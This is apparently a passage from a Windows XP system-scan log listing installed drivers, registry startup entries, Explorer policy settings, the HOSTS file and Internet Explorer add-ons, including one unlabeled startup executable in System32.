(GEARAspiWDM) GEARAspiWDM [Kernel | On_Demand | Running] -> %System32%\DRIVERS\GEARAspiWDM.sys -> GEAR Software Inc. [Ver = 2.0.6.1 | Size = 15664 bytes | Modified Date = 9/19/2006 4:44:04 PM | Attr = ]
(GTNDIS5) GTNDIS5 NDIS Protocol Driver [Kernel | On_Demand | Running] -> %System32%\GTNDIS5.sys -> Printing Communications Assoc., Inc. (PCAUSA) [Ver = 5.03.16.54 | Size = 15872 bytes | Modified Date = 9/25/2003 10:15:32 PM | Attr = ]
(HPZid412) IEEE-1284.4 Driver HPZid412 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\hpzid412.sys -> HP [Ver = 6, 0, 0, 0 | Size = 51024 bytes | Modified Date = 3/9/2003 3:31:00 PM | Attr = ]
(HPZipr12) Print Class Driver for IEEE-1284.4 HPZipr12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZipr12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 16080 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(HPZius12) USB to IEEE-1284.4 Translation Driver HPZius12 [Kernel | On_Demand | Running] -> %System32%\DRIVERS\HPZius12.sys -> HP [Ver = 6, 0, 0, 0 | Size = 21456 bytes | Modified Date = 3/9/2003 3:31:02 PM | Attr = ]
(i81x) i81x [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\i81xnt5.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 161020 bytes | Modified Date = 8/4/2004 12:29:36 AM | Attr = ]
(iAimFP0) iAimFP0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12415 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP1) iAimFP1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12127 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP2) iAimFP2 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wadv05nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 11775 bytes | Modified Date = 8/4/2004 12:29:38 AM | Attr = ]
(iAimFP3) iAimFP3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wsiintxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 12063 bytes | Modified Date = 8/4/2004 12:29:48 AM | Attr = ]
(iAimFP4) iAimFP4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wvchntxx.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19455 bytes | Modified Date = 8/4/2004 12:29:50 AM | Attr = ]
(iAimTV0) iAimTV0 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv01nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 29311 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV1) iAimTV1 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv02nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 19551 bytes | Modified Date = 8/4/2004 12:29:42 AM | Attr = ]
(iAimTV2) iAimTV2 [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wATV03nt.sys -> File not found
(iAimTV3) iAimTV3 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\watv04nt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 33599 bytes | Modified Date = 8/4/2004 12:29:44 AM | Attr = ]
(iAimTV4) iAimTV4 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\wch7xxnt.sys -> Intel® Corporation [Ver = 6.13.01.3198 | Size = 23615 bytes | Modified Date = 8/4/2004 12:29:46 AM | Attr = ]
(IntelC51) IntelC51 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC51.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 1232741 bytes | Modified Date = 11/20/2003 11:13:40 PM | Attr = ]
(IntelC52) IntelC52 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC52.sys -> Intel Corporation [Ver = 4.58.1 | Size = 646825 bytes | Modified Date = 11/20/2003 11:14:28 PM | Attr = ]
(IntelC53) IntelC53 [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\IntelC53.sys -> Intel Corporation [Ver = 2.15.25.0 | Size = 59717 bytes | Modified Date = 11/20/2003 11:12:56 PM | Attr = ]
(lbrtfdc) lbrtfdc [Kernel | System | Stopped] -> -> File not found
(LVUSBSta) Logitech USB Monitor Filter [Kernel | On_Demand | Running] -> %System32%\DRIVERS\LVUSBSta.sys -> Logitech Inc. [Ver = 8.4.6.1016 | Size = 22016 bytes | Modified Date = 1/31/2005 10:12:48 AM | Attr = ]
(mohfilt) mohfilt [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\mohfilt.sys -> Intel Corporation [Ver = 7.11.0.0 | Size = 37048 bytes | Modified Date = 11/20/2003 11:12:42 PM | Attr = ]
(mraid35x) mraid35x [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\MRAID35X.SYS -> American Megatrends Inc. [Ver = 6.19 (XPClient.010817-1148) | Size = 17280 bytes | Modified Date = 8/17/2001 2:52:12 PM | Attr = ]
(MxlW2k) MxlW2k [Kernel | On_Demand | Running] -> %System32%\drivers\MxlW2k.sys -> MusicMatch, Inc. [Ver = 1.1.0.116 | Size = 28256 bytes | Modified Date = 12/18/2004 6:56:24 PM | Attr = ]
(nv) nv [Kernel | On_Demand | Running] -> %System32%\DRIVERS\nv4_mini.sys -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 3530432 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
(omci) OMCI WDM Device Driver [Kernel | System | Running] -> %System32%\DRIVERS\omci.sys -> Dell Computer Corporation [Ver = 7, 0, 323, 0 | Size = 17217 bytes | Modified Date = 11/8/2002 2:45:06 PM | Attr = ]
(P16X) Creative SB Live! Series (WDM) [Kernel | On_Demand | Running] -> %System32%\DRIVERS\P16X.sys -> Creative Technology Ltd. [Ver = 5.12.01.129 | Size = 1296384 bytes | Modified Date = 8/14/2003 11:58:12 AM | Attr = ]
(PCIDump) PCIDump [Kernel | System | Stopped] -> -> File not found
(PDCOMP) PDCOMP [Kernel | On_Demand | Stopped] -> -> File not found
(PDFRAME) PDFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(PDRELI) PDRELI [Kernel | On_Demand | Stopped] -> -> File not found
(PDRFRAME) PDRFRAME [Kernel | On_Demand | Stopped] -> -> File not found
(pfc) Padus ASPI Shell [Kernel | On_Demand | Running] -> %System32%\DRIVERS\pfc.sys -> Padus, Inc. [Ver = 2, 5, 0, 200 | Size = 14604 bytes | Modified Date = 8/11/2003 10:07:46 AM | Attr = ]
(PfModNT) PfModNT [Kernel | Auto | Running] -> %System32%\PFMODNT.SYS -> Creative Technology Ltd. [Ver = 2.0.0.0 | Size = 6752 bytes | Modified Date = 12/17/1999 2:00:00 AM | Attr = ]
(PQNTDrv) PQNTDrv [Kernel | System | Running] -> %System32%\drivers\PQNTDRV.sys -> PowerQuest Corporation [Ver = 8.00.000 | Size = 4228 bytes | Modified Date = 4/16/2003 2:21:30 PM | Attr = ]
(PRISM_A02) 802.11a/g USB Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\WUSB20XP.sys -> Cisco-Linksys, LLC. [Ver = 1.0.8 | Size = 339488 bytes | Modified Date = 1/7/2004 5:04:00 PM | Attr = ]
(Ptilink) Direct Parallel Link Driver [Kernel | On_Demand | Running] -> %System32%\DRIVERS\PTILINK.SYS -> Parallel Technologies, Inc. [Ver = 1.10 (XPClient.010817-1148) | Size = 17792 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(PxHelp20) PxHelp20 [Kernel | Boot | Running] -> %System32%\DRIVERS\pxhelp20.sys -> Sonic Solutions [Ver = 2.02.57a | Size = 17168 bytes | Modified Date = 7/30/2003 3:02:00 AM | Attr = ]
(QCMerced) Logitech QuickCam Communicate [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\lvcm.sys -> [Ver = | Size = 585824 bytes | Modified Date = 10/8/2004 10:58:34 AM | Attr = ]
(ql1080) ql1080 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1080.SYS -> QLogic Corporation [Ver = 3.04 | Size = 40320 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql12160) ql12160 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL12160.SYS -> QLogic Corporation [Ver = 7.13.02 (W64) | Size = 45312 bytes | Modified Date = 8/17/2001 2:52:20 PM | Attr = ]
(ql1280) ql1280 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\QL1280.SYS -> QLogic Corporation [Ver = 7.13.01 (W2K) | Size = 49024 bytes | Modified Date = 8/17/2001 2:52:18 PM | Attr = ]
(Secdrv) Secdrv [Kernel | Auto | Running] -> %System32%\DRIVERS\secdrv.sys -> [Ver = | Size = 27440 bytes | Modified Date = 8/29/2002 6:00:00 AM | Attr = ]
(Simbad) Simbad [Kernel | Disabled | Stopped] -> -> File not found
(sisagp) SIS AGP Bus Filter [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\sisagp.sys -> Silicon Integrated Systems Corporation [Ver = 5.12.01.2010 (xpsp_sp2_rtm.040803-2158) | Size = 41088 bytes | Modified Date = 8/4/2004 1:07:42 AM | Attr = ]
(SoP1kUSB) Sony PEG Virtual Port [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\SoP1kUSB.sys -> Sony Corporation [Ver = 1.00.0006070 | Size = 29440 bytes | Modified Date = 10/9/2001 4:39:32 PM | Attr = ]
(Sparrow) Sparrow [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SPARROW.SYS -> Adaptec, Inc. [Ver = v2.0a (ReleaseBinaries.001205-1804) | Size = 19072 bytes | Modified Date = 8/17/2001 3:07:44 PM | Attr = ]
(sscdbhk5) sscdbhk5 [File_System | System | Running] -> %System32%\DRIVERS\sscdbhk5.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 5621 bytes | Modified Date = 7/14/2003 12:28:40 PM | Attr = ]
(ssrtln) ssrtln [File_System | System | Running] -> %System32%\DRIVERS\ssrtln.sys -> Sonic Solutions [Ver = 1.10.81a | Size = 23219 bytes | Modified Date = 7/14/2003 12:28:22 PM | Attr = ]
(symc810) symc810 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC810.SYS -> Symbios Logic Inc. [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 16256 bytes | Modified Date = 8/17/2001 3:07:34 PM | Attr = ]
(symc8xx) symc8xx [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYMC8XX.SYS -> LSI Logic [Ver = 5.1.2409.1 (ReleaseBinaries.001205-1804) | Size = 32640 bytes | Modified Date = 8/17/2001 3:07:36 PM | Attr = ]
(sym_hi) sym_hi [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_HI.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 28384 bytes | Modified Date = 8/17/2001 3:07:40 PM | Attr = ]
(sym_u3) sym_u3 [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\SYM_U3.SYS -> LSI Logic [Ver = 5.1.2462.0 (Lab01_N.010309-0027) | Size = 30688 bytes | Modified Date = 8/17/2001 3:07:42 PM | Attr = ]
(tfsnboio) tfsnboio [File_System | Auto | Running] -> %System32%\dla\tfsnboio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 25685 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsncofs) tfsncofs [File_System | Auto | Running] -> %System32%\dla\tfsncofs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 34837 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndrct) tfsndrct [File_System | Auto | Running] -> %System32%\dla\tfsndrct.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 4117 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsndres) tfsndres [File_System | Auto | Running] -> %System32%\dla\tfsndres.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 2233 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnifs) tfsnifs [File_System | Auto | Running] -> %System32%\dla\tfsnifs.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 83284 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnopio) tfsnopio [File_System | Auto | Running] -> %System32%\dla\tfsnopio.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 14229 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnpool) tfsnpool [File_System | Auto | Running] -> %System32%\dla\tfsnpool.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 6357 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudf) tfsnudf [File_System | Auto | Running] -> %System32%\dla\tfsnudf.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 98068 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(tfsnudfa) tfsnudfa [File_System | Auto | Running] -> %System32%\dla\tfsnudfa.sys -> Sonic Solutions [Ver = 1.04.05b | Size = 100373 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
(ultra) ultra [Kernel | Disabled | Stopped] -> %System32%\DRIVERS\ULTRA.SYS -> Promise Technology, Inc. [Ver = 1.43 (Build 0603) | Size = 36736 bytes | Modified Date = 8/17/2001 2:52:22 PM | Attr = ]
(VET-FILT) VET File System Filter [Kernel | System | Running] -> %System32%\drivers\Vet-Filt.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 21031 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VET-REC) VET File System Recognizer [Kernel | System | Running] -> %System32%\drivers\Vet-Rec.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15478 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETEBOOT) VET Boot Scan Engine [Kernel | On_Demand | Running] -> %System32%\drivers\VetEBoot.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 108656 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
(VETEFILE) VET File Scan Engine [Kernel | System | Running] -> %System32%\drivers\VetEFile.sys -> Computer Associates International, Inc. [Ver = 30.7.0.0 | Size = 630464 bytes | Modified Date = 5/4/2007 8:56:10 AM | Attr = ]
(VETFDDNT) VET Floppy Boot Sector Monitor [Kernel | System | Running] -> %System32%\drivers\VetFDDNT.sys -> Computer Associates International, Inc. [Ver = 11.0.7.7 | Size = 15735 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
(VETMONNT) VET File Monitor [Kernel | System | Running] -> %System32%\drivers\vetmonnt.sys -> Computer Associates International, Inc. [Ver = 7.2.0.0 | Size = 26787 bytes | Modified Date = 7/31/2006 12:56:06 PM | Attr = ]
(W8100PCI) D-Link AirPlus G Wireless Driver [Kernel | On_Demand | Stopped] -> %System32%\DRIVERS\MRV8K51.sys -> Marvell Semiconductor, Inc [Ver = 2.03.00.000 built by: WinDDK | Size = 297984 bytes | Modified Date = 1/8/2004 10:46:18 PM | Attr = R ]
(wanatw) WAN Miniport (ATW) [Kernel | On_Demand | Stopped] -> System32\DRIVERS\wanatw4.sys -> File not found
(WDICA) WDICA [Kernel | On_Demand | Stopped] -> -> File not found

[Registry - Non-Microsoft Only]
< Run [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
CaAvTray -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVTray.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 230512 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
CAVRID -> %ProgramFiles%\CA\eTrust EZ Armor\eTrust EZ Antivirus\CAVRid.exe -> Computer Associates International, Inc. [Ver = Version 11.0.7.7 | Size = 185456 bytes | Modified Date = 6/25/2006 9:37:30 PM | Attr = ]
diagent -> %ProgramFiles%\Creative\SBLive\Diagnostics\diagent.exe -> Creative Technology Ltd [Ver = 1, 1, 4, 0 | Size = 135264 bytes | Modified Date = 4/3/2002 2:01:00 AM | Attr = ]
DwlClient -> %CommonProgramFiles%\Dell\EUSW\Support.exe -> Dell [Ver = 2, 1, 1, 0 | Size = 323584 bytes | Modified Date = 5/27/2004 9:05:42 PM | Attr = ]
iTunesHelper -> %ProgramFiles%\iTunes\iTunesHelper.exe -> Apple Computer, Inc. [Ver = 7.0.2.16 | Size = 256576 bytes | Modified Date = 10/30/2006 10:36:36 AM | Attr = ]
LogitechVideoRepair -> %ProgramFiles%\Logitech\Video\ISStart.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 458752 bytes | Modified Date = 1/18/2005 5:47:30 PM | Attr = ]
LogitechVideoTray -> %ProgramFiles%\Logitech\Video\LogiTray.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 217088 bytes | Modified Date = 1/18/2005 5:37:30 PM | Attr = ]
MSMSGNER -> %System32%\a.exe -> [Ver = | Size = 521728 bytes | Modified Date = 6/10/2007 2:04:02 AM | Attr = ]
NeroFilterCheck -> %System32%\NeroCheck.exe -> Ahead Software Gmbh [Ver = 1, 0, 0, 2 | Size = 155648 bytes | Modified Date = 7/9/2001 10:50:42 AM | Attr = ]
NvCplDaemon -> %System32%\nvcpl.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 7286784 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
NvMediaCenter -> %System32%\nvmctray.dll [RUNDLL32.EXE C:\WINDOWS\System32\NvMcTray.dll,NvTaskbarInit] -> NVIDIA Corporation [Ver = 6.14.10.8185 | Size = 86016 bytes | Modified Date = 10/10/2005 10:49:00 PM | Attr = ]
QuickTime Task -> %ProgramFiles%\QuickTime\qttask.exe -> Apple Computer, Inc. [Ver = 7.1.3 | Size = 282624 bytes | Modified Date = 10/25/2006 7:58:18 PM | Attr = ]
SunJavaUpdateSched -> %ProgramFiles%\Java\j2re1.4.2_04\bin\jusched.exe -> [Ver = | Size = 32881 bytes | Modified Date = 2/22/2004 11:44:44 PM | Attr = ]
TkBellExe -> %CommonProgramFiles%\Real\Update_OB\realsched.exe -> RealNetworks, Inc. [Ver = 0.1.0.1622 | Size = 151597 bytes | Modified Date = 3/26/2004 4:10:10 PM | Attr = ]
< OptionalComponents [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OptionalComponents\
IMAIL -> Installed = 1 ->
MAPI -> Installed = 1 ->
MSFS -> Installed = 1 ->
< Run [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
LogitechSoftwareUpdate -> %ProgramFiles%\Logitech\Video\ManifestEngine.exe -> Logitech Inc. [Ver = 8.4.6.1012 | Size = 196608 bytes | Modified Date = 1/18/2005 5:07:54 PM | Attr = ]
MoneyAgent -> %ProgramFiles%\Microsoft Money\System\mnyexpr.exe -> File not found
< Common Startup > -> C:\Documents and Settings\All Users\Start Menu\Programs\Startup
%AllUsersStartup%\Adobe Gamma Loader.lnk -> %CommonProgramFiles%\Adobe\Calibration\Adobe Gamma Loader.exe -> Adobe Systems, Inc. [Ver = 1, 0, 0, 1 | Size = 113664 bytes | Modified Date = 11/4/1999 3:06:48 PM | Attr = ]
%AllUsersStartup%\Adobe Reader Speed Launch.lnk -> %ProgramFiles%\Adobe\Acrobat 7.0\Reader\reader_sl.exe -> Adobe Systems Incorporated [Ver = 7.0.5.2005092300 | Size = 29696 bytes | Modified Date = 9/23/2005 10:05:26 PM | Attr = ]
%AllUsersStartup%\D-Link AirPlus G Configuration Utility.lnk -> %ProgramFiles%\D-Link AirPlus G\AIRPLUS.exe -> D-Link [Ver = 1, 0, 0, 0 | Size = 294912 bytes | Modified Date = 1/6/2004 9:19:38 PM | Attr = ]
%AllUsersStartup%\HotSync Manager.lnk -> %ProgramFiles%\Sony Handheld\HOTSYNC.EXE -> Palm, Inc. [Ver = 4.0.1 | Size = 299008 bytes | Modified Date = 5/31/2001 9:52:46 AM | Attr = ]
%AllUsersStartup%\hp psc 2000 Series.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpobnz08.exe -> Hewlett-Packard Co. [Ver = 4.2.0.021 | Size = 323646 bytes | Modified Date = 4/9/2003 6:41:38 PM | Attr = ]
%AllUsersStartup%\hpoddt01.exe.lnk -> %ProgramFiles%\Hewlett-Packard\Digital Imaging\bin\hpotdd01.exe -> Hewlett-Packard [Ver = 1, 0, 0, 1 | Size = 28672 bytes | Modified Date = 4/9/2003 7:11:12 PM | Attr = ]
%AllUsersStartup%\Sony PDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
%AllUsersStartup%\SonyPDA USB Switcher.lnk -> %ProgramFiles%\Sony Handheld\USBSwt.exe -> Sony Corporation [Ver = 1.10.0008210 | Size = 57344 bytes | Modified Date = 2/2/2001 12:13:00 AM | Attr = ]
< User Startup > -> C:\Documents and Settings\Admin\Start Menu\Programs\Startup
-> %UserStartup%\PowerReg Scheduler V3.exe -> Leader Technologies [Ver = 3,0,0,0 | Size = 225280 bytes | Modified Date = 5/27/2004 11:02:24 PM | Attr = ]
< SecurityProviders [HKLM] > -> HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\\SecurityProviders
< Winlogon settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< Winlogon settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
< CurrentVersion Policy Settings [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> _
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoCDBurning -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{BDEADF00-C265-11D0-BCED-00A0C90AB50F} -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} -> 1073741857 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\NonEnum\\{0DF44EAA-FF21-4412-828E-260A8728E7F1} -> 32 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\ -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\dontdisplaylastusername -> 0 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticecaption -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\legalnoticetext -> ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\shutdownwithoutlogon -> 1 ->
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\\undockwithoutlogon -> 1 ->
< CurrentVersion Policy Settings [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\ -> ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\\NoDriveTypeAutoRun -> 145 ->
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\WinOldApp\ -> ->
< HOSTS File > (734 bytes) -> C:\WINDOWS\System32\drivers\etc\Hosts
127.0.0.1 localhost -> ->
< Internet Explorer Settings > ->
HKLM: Default_Page_URL -> http://www.dell4me.com/myway ->
HKLM: Main\\Default_Search_URL -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Local Page -> %SystemRoot%\system32\blank.htm ->
HKLM: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKLM: Start Page -> http://www.dell4me.com/myway ->
HKLM: CustomizeSearch -> http://ie.search.msn.com/en-us/srchasst/srchcust.htm ->
HKLM: SearchAssistant -> http://ie.search.msn.com/en-us/srchasst/srchasst.htm ->
HKCU: Default_Page_URL -> http://www.dell4me.com/myway ->
HKCU: Local Page -> C:\WINDOWS\system32\blank.htm ->
HKCU: Search Bar -> http://g.msn.com/0SEENUS/SAOS01 ->
HKCU: Search Page -> http://www.microsoft.com/isapi/redir.dll?p...amp;ar=iesearch ->
HKCU: Start Page -> http://www.yahoo.com/ ->
HKCU: ProxyEnable -> 0 ->
< Trusted Sites > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\
msn.com [ - ] -> ->
< BHO's > -> HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\
{06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} [HKLM] -> %ProgramFiles%\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll [Adobe PDF Reader Link Helper] -> Adobe Systems Incorporated [Ver = 7.0.7.2006011200 | Size = 63128 bytes | Modified Date = 1/12/2006 8:38:22 PM | Attr = ]
{53707962-6F74-2D53-2644-206D7942484F} [HKLM] -> %ProgramFiles%\Spybot - Search & Destroy\SDHelper.dll [] -> Safer Networking Limited [Ver = 1, 4, 0, 0 | Size = 853672 bytes | Modified Date = 5/31/2005 1:04:00 AM | Attr = ]
{5CA3D70E-1895-11CF-8E15-001234567890} [HKLM] -> %System32%\dla\tfswshx.dll [DriveLetterAccess] -> Sonic Solutions [Ver = 1.04.05b | Size = 106548 bytes | Modified Date = 8/6/2003 2:04:00 AM | Attr = ]
< Internet Explorer Bars [HKCU] > -> HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\
{32683183-48a0-441b-a342-7c2a440a9478} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer ToolBars [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ToolBar
{BA52B914-B692-46c4-B683-905236F6F655} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer ToolBars [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\
ShellBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
WebBrowser\\{42CDD1BF-3FFB-4238-8AD1-7859DF00B1D6} [HKLM] -> Reg Data - Key not found [Reg Data - Key not found] -> File not found
< Internet Explorer Extensions [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extensions\
{08B0E5C0-4FCB-11CF-AAA5-00401C608501} [HKLM] -> %System32%\msjava.dll [MenuText: Sun Java Console] -> File not found
{6224f700-cba3-4071-b251-47cb894244cd} -> %ProgramFiles%\ICQ\Icq.exe [ButtonText: ICQ Pro] -> ICQ Inc. [Ver = 5,5,6,3916 | Size = 1880639 bytes | Modified Date = 10/14/2003 12:03:50 PM | Attr = ]
{B7FE5D70-9AA2-40F1-9C6B-12A255F085E1} -> %ProgramFiles%\PartyPoker\PartyPoker.exe [ButtonText: PartyPoker.com] -> iGlobalMedia.com [Ver = 1, 0, 0, 1 | Size = 2613248 bytes | Modified Date = 7/8/2005 10:09:02 PM | Attr = ]
{CD67F990-D8E9-11d2-98FE-00C0F0318AFE} -> Reg Data - Value does not exist [ButtonText: Real.com] -> File not found
< Internet Explorer Menu Extensions [HKCU] > -> HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\
E&xport to Microsoft Excel -> -> File not found
< Internet Explorer Plugins [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Plugins\Extension\
.spop -> %ProgramFiles%\Internet Explorer\PLUGINS\NPDocBox.dll [Reg Data - Value does not exist] -> Intertrust Technologies, Inc. [Ver = 1.0.0.32 | Size = 270336 bytes | Modified Date = 8/1/2001 5:05:42 PM | Attr = ]
< User Agent Post Platform [HKLM] > -> HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent\Post Platform
